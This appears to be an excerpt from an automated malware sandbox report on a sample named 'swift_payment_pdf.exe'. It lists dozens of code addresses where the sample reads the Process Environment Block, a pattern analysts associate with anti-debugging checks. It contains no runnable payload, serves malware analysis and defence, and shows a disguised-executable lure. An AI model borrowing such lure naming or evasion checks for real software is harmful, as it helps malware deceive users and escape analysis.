            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0140A250 mov eax, dword ptr fs:[00000030h]5_2_0140A250
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0142625D mov eax, dword ptr fs:[00000030h]5_2_0142625D
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01400274 mov eax, dword ptr fs:[00000030h]5_2_01400274
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01400274 mov eax, dword ptr fs:[00000030h]5_2_01400274
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01400274 mov eax, dword ptr fs:[00000030h]5_2_01400274
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01400274 mov eax, dword ptr fs:[00000030h]5_2_01400274
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01400274 mov eax, dword ptr fs:[00000030h]5_2_01400274
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01400274 mov eax, dword ptr fs:[00000030h]5_2_01400274
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01400274 mov eax, dword ptr fs:[00000030h]5_2_01400274
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01400274 mov eax, dword ptr fs:[00000030h]5_2_01400274
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01400274 mov eax, dword ptr fs:[00000030h]5_2_01400274
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01400274 mov eax, dword ptr fs:[00000030h]5_2_01400274
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01400274 mov eax, dword ptr fs:[00000030h]5_2_01400274
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01400274 mov eax, dword ptr fs:[00000030h]5_2_01400274
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01354260 mov eax, dword ptr fs:[00000030h]5_2_01354260
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01354260 mov eax, dword ptr fs:[00000030h]5_2_01354260
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01354260 mov eax, dword ptr fs:[00000030h]5_2_01354260
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0134826B mov eax, dword ptr fs:[00000030h]5_2_0134826B
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0134A250 mov eax, dword ptr fs:[00000030h]5_2_0134A250
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01356259 mov eax, dword ptr fs:[00000030h]5_2_01356259
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D8243 mov eax, dword ptr fs:[00000030h]5_2_013D8243
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D8243 mov ecx, dword ptr fs:[00000030h]5_2_013D8243
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_014262D6 mov eax, dword ptr fs:[00000030h]5_2_014262D6
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013602A0 mov eax, dword ptr fs:[00000030h]5_2_013602A0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013602A0 mov eax, dword ptr fs:[00000030h]5_2_013602A0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013E62A0 mov eax, dword ptr fs:[00000030h]5_2_013E62A0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013E62A0 mov ecx, dword ptr fs:[00000030h]5_2_013E62A0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013E62A0 mov eax, dword ptr fs:[00000030h]5_2_013E62A0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013E62A0 mov eax, dword ptr fs:[00000030h]5_2_013E62A0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013E62A0 mov eax, dword ptr fs:[00000030h]5_2_013E62A0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013E62A0 mov eax, dword ptr fs:[00000030h]5_2_013E62A0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138E284 mov eax, dword ptr fs:[00000030h]5_2_0138E284
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138E284 mov eax, dword ptr fs:[00000030h]5_2_0138E284
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D0283 mov eax, dword ptr fs:[00000030h]5_2_013D0283
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D0283 mov eax, dword ptr fs:[00000030h]5_2_013D0283
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D0283 mov eax, dword ptr fs:[00000030h]5_2_013D0283
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013602E1 mov eax, dword ptr fs:[00000030h]5_2_013602E1
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013602E1 mov eax, dword ptr fs:[00000030h]5_2_013602E1
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013602E1 mov eax, dword ptr fs:[00000030h]5_2_013602E1
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0135A2C3 mov eax, dword ptr fs:[00000030h]5_2_0135A2C3
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0135A2C3 mov eax, dword ptr fs:[00000030h]5_2_0135A2C3
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0135A2C3 mov eax, dword ptr fs:[00000030h]5_2_0135A2C3
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0135A2C3 mov eax, dword ptr fs:[00000030h]5_2_0135A2C3
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0135A2C3 mov eax, dword ptr fs:[00000030h]5_2_0135A2C3
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01360535 mov eax, dword ptr fs:[00000030h]5_2_01360535
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01360535 mov eax, dword ptr fs:[00000030h]5_2_01360535
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01360535 mov eax, dword ptr fs:[00000030h]5_2_01360535
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01360535 mov eax, dword ptr fs:[00000030h]5_2_01360535
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01360535 mov eax, dword ptr fs:[00000030h]5_2_01360535
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01360535 mov eax, dword ptr fs:[00000030h]5_2_01360535
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137E53E mov eax, dword ptr fs:[00000030h]5_2_0137E53E
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137E53E mov eax, dword ptr fs:[00000030h]5_2_0137E53E
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137E53E mov eax, dword ptr fs:[00000030h]5_2_0137E53E
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137E53E mov eax, dword ptr fs:[00000030h]5_2_0137E53E
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137E53E mov eax, dword ptr fs:[00000030h]5_2_0137E53E
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013E6500 mov eax, dword ptr fs:[00000030h]5_2_013E6500
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01424500 mov eax, dword ptr fs:[00000030h]5_2_01424500
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01424500 mov eax, dword ptr fs:[00000030h]5_2_01424500
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01424500 mov eax, dword ptr fs:[00000030h]5_2_01424500
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01424500 mov eax, dword ptr fs:[00000030h]5_2_01424500
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01424500 mov eax, dword ptr fs:[00000030h]5_2_01424500
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01424500 mov eax, dword ptr fs:[00000030h]5_2_01424500
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01424500 mov eax, dword ptr fs:[00000030h]5_2_01424500
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138656A mov eax, dword ptr fs:[00000030h]5_2_0138656A
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138656A mov eax, dword ptr fs:[00000030h]5_2_0138656A
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138656A mov eax, dword ptr fs:[00000030h]5_2_0138656A
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01358550 mov eax, dword ptr fs:[00000030h]5_2_01358550
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01358550 mov eax, dword ptr fs:[00000030h]5_2_01358550
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013745B1 mov eax, dword ptr fs:[00000030h]5_2_013745B1
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013745B1 mov eax, dword ptr fs:[00000030h]5_2_013745B1
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D05A7 mov eax, dword ptr fs:[00000030h]5_2_013D05A7
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D05A7 mov eax, dword ptr fs:[00000030h]5_2_013D05A7
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D05A7 mov eax, dword ptr fs:[00000030h]5_2_013D05A7
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138E59C mov eax, dword ptr fs:[00000030h]5_2_0138E59C
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01384588 mov eax, dword ptr fs:[00000030h]5_2_01384588
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01352582 mov eax, dword ptr fs:[00000030h]5_2_01352582
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01352582 mov ecx, dword ptr fs:[00000030h]5_2_01352582
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137E5E7 mov eax, dword ptr fs:[00000030h]5_2_0137E5E7
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137E5E7 mov eax, dword ptr fs:[00000030h]5_2_0137E5E7
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137E5E7 mov eax, dword ptr fs:[00000030h]5_2_0137E5E7
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137E5E7 mov eax, dword ptr fs:[00000030h]5_2_0137E5E7
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137E5E7 mov eax, dword ptr fs:[00000030h]5_2_0137E5E7
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137E5E7 mov eax, dword ptr fs:[00000030h]5_2_0137E5E7
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137E5E7 mov eax, dword ptr fs:[00000030h]5_2_0137E5E7
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137E5E7 mov eax, dword ptr fs:[00000030h]5_2_0137E5E7
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013525E0 mov eax, dword ptr fs:[00000030h]5_2_013525E0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138C5ED mov eax, dword ptr fs:[00000030h]5_2_0138C5ED
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138C5ED mov eax, dword ptr fs:[00000030h]5_2_0138C5ED
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013565D0 mov eax, dword ptr fs:[00000030h]5_2_013565D0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138A5D0 mov eax, dword ptr fs:[00000030h]5_2_0138A5D0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138A5D0 mov eax, dword ptr fs:[00000030h]5_2_0138A5D0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138E5CF mov eax, dword ptr fs:[00000030h]5_2_0138E5CF
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138E5CF mov eax, dword ptr fs:[00000030h]5_2_0138E5CF
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0134C427 mov eax, dword ptr fs:[00000030h]5_2_0134C427
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0134E420 mov eax, dword ptr fs:[00000030h]5_2_0134E420
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0134E420 mov eax, dword ptr fs:[00000030h]5_2_0134E420
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_0134E420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_0140A456 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013D6420 mov eax, dword ptr fs:[00000030h] (7 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_01388402 mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_0137A470 mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013DC460 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_0134645D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_0137245A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_0138E443 mov eax, dword ptr fs:[00000030h] (8 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013844B0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013DA4B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013564AB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013504E5 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_0140A49A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_0138273C mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_0138273C mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013CC730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_0138C720 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_01350710 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_01380710 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_0138C700 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_01358770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_01360770 mov eax, dword ptr fs:[00000030h] (12 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013DE75D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_01350750 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013D4755 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_01392750 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_0138674D mov esi, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_0138674D mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013507AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013F678E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013547FB mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013727ED mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013DE7E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_014047A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_0135C7C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013D07C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_0136E627 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_01386620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_01388620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_0135262C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_01392619 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_0141866E mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013CE609 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_0136260B mov eax, dword ptr fs:[00000030h] (7 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_01382674 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_0138A660 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_0136C640 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013866B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_0138C6A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_01354690 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013D06F1 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013CE6F2 mov eax, dword ptr fs:[00000030h] (4 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_0138A6C7 mov ebx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_0138A6C7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_01424940 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013E892B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013D892A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_01348918 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013DC912 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013CE908 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013DC97C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013F4978 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_01376962 mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_0139096E mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_0139096E mov edx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013D0946 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013D89B3 mov esi, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013D89B3 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_0141A9D3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013629A0 mov eax, dword ptr fs:[00000030h] (13 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013509AD mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013829F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013DE9E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_0135A9D0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013849D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013E69C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_01372835 mov eax, dword ptr fs:[00000030h] (5 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_01372835 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013F483A mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_0138A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013DC810 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013E6870 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013DE872 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_01380854 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_01354859 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_01362840 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_014208C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013DC89D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_0141A8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_01350887 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_0138C8F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_0137E8C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_0141AB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_01404B4B mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_01422B57 mov eax, dword ptr fs:[00000030h] (4 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_0137EB20 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013CEB1D mov eax, dword ptr fs:[00000030h] (9 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_01424B00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_0134CB7E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_01348B50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_01418B28 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013FEB50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013F8B42 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013E6B40 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_01360BBE mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_01358BF0 mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_0137EBFC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013DCBF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013FEBD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_01404BB0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_01350BCD mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_01370BCB mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_01374A35 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_0137EA2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_0138CA24 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013DCA11 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013CCA72 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_0138CA6F mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_013FEA60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_01356A50 mov eax, dword ptr fs:[00000030h] (7 occurrences)
            Source: C:\Users\user\Desktop\swift_payment_pdf.exe Code function: 5_2_01360A5B mov eax, dword ptr fs:[00000030h] (2 occurrences)
